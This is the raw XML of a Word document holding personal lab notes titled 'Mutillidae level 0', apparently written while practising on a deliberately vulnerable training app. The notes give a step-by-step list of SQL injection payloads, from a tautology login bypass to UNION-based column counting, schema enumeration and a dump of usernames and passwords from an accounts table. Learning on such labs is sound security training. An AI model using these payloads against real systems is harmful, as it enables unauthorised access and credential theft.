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68" w:rsidRPr="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615FCF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Mutillidae level 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00615FCF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00780829">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ERROR Based and BOOLEAN Based</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRPr="00615FCF" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>First we check it the developer used ‘ or “ for check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF">
      <w:r>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Get all the user details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF">
      <w:r>
        <w:t xml:space="preserve">‘ or 5=5 --   </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> last line space included.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF"/>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Get particular user details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF">
      <w:r>
        <w:t xml:space="preserve">admin’ -- </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0DF"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> last line space included.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF"/>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Get number of columns in the table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF">
      <w:r>
        <w:t xml:space="preserve">admin’ union select null </w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union select null,null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’ union select null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">null,null -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> union select null,null,</w:t>
      </w:r>
      <w:r>
        <w:t>null,null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’ union select null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>null,null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">null,null -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’ union select null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">null,null,null,null,null -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’ union select null</w:t>
      </w:r>
      <w:r>
        <w:t>,null,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">null,null,null,null,null -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF" w:rsidP="00615FCF">
      <w:r>
        <w:t>admin’ union select null</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>null,null,null,null,null</w:t>
      </w:r>
      <w:r>
        <w:t>,null,null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF"/>
    <w:p w:rsidR="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Then identify which columns assigned in the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="00615FCF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>admin’ union select column-1,column-2,column-3,column-4,column-5,column-6,column-7</w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00615FCF" w:rsidRDefault="00615FCF"/>
    <w:p w:rsidR="00615FCF" w:rsidRPr="002E563B" w:rsidRDefault="002E563B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>t the database_</w:t>
      </w:r>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">name, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>database_version and current_</w:t>
      </w:r>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B">
      <w:r>
        <w:t xml:space="preserve">lourdhu’ union select null,@@version,current_user,database(),null,null,null </w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B"/>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E563B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Get the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> table_name, column_name and data_type in the database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B">
      <w:r>
        <w:t xml:space="preserve">lourdhu’ union select null,table_name,column_name,data_type,null,null,null information_schema.columns where table_name=’accounts’ </w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B"/>
    <w:p w:rsidR="002E563B" w:rsidRDefault="002E563B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Get the first three column data’s in the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E563B" w:rsidRDefault="004911F7">
      <w:r>
        <w:t xml:space="preserve">‘ union select null,cid,username,password,null,null,null from accounts </w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004911F7" w:rsidRDefault="004911F7"/>
    <w:p w:rsidR="004911F7" w:rsidRDefault="004911F7" w:rsidP="004911F7">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Get the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> three column data’s in the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004911F7" w:rsidRDefault="004911F7">
      <w:r>
        <w:t>‘ union select null,</w:t>
      </w:r>
      <w:r w:rsidR="00177D72">
        <w:t xml:space="preserve">mysignature,firstname,lastname,null,null,null from accounts -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177D72" w:rsidRDefault="00177D72"/>
    <w:p w:rsidR="00177D72" w:rsidRPr="004911F7" w:rsidRDefault="00177D72"/>
    <w:sectPr w:rsidR="00177D72" w:rsidRPr="004911F7" w:rsidSect="001A3F34">
      <w:pgSz w:w="11909" w:h="16834" w:code="9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207" w:rsidRDefault="009B1207" w:rsidP="00615FCF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009B1207" w:rsidRDefault="009B1207" w:rsidP="0061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207" w:rsidRDefault="009B1207" w:rsidP="00615FCF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="009B1207" w:rsidRDefault="009B1207" w:rsidP="00615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CF"/>
    <w:rsid w:val="00177D72"/>
    <w:rsid w:val="001A3F34"/>
    <w:rsid w:val="002E563B"/>
    <w:rsid w:val="004911F7"/>
    <w:rsid w:val="004E5468"/>
    <w:rsid w:val="00615FCF"/>
    <w:rsid w:val="0062554A"/>
    <w:rsid w:val="00662FA9"/>
    <w:rsid w:val="00780829"/>
    <w:rsid w:val="009B1207"/>
    <w:rsid w:val="00A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F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061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F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061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2018-07-31T05:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-31T05:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>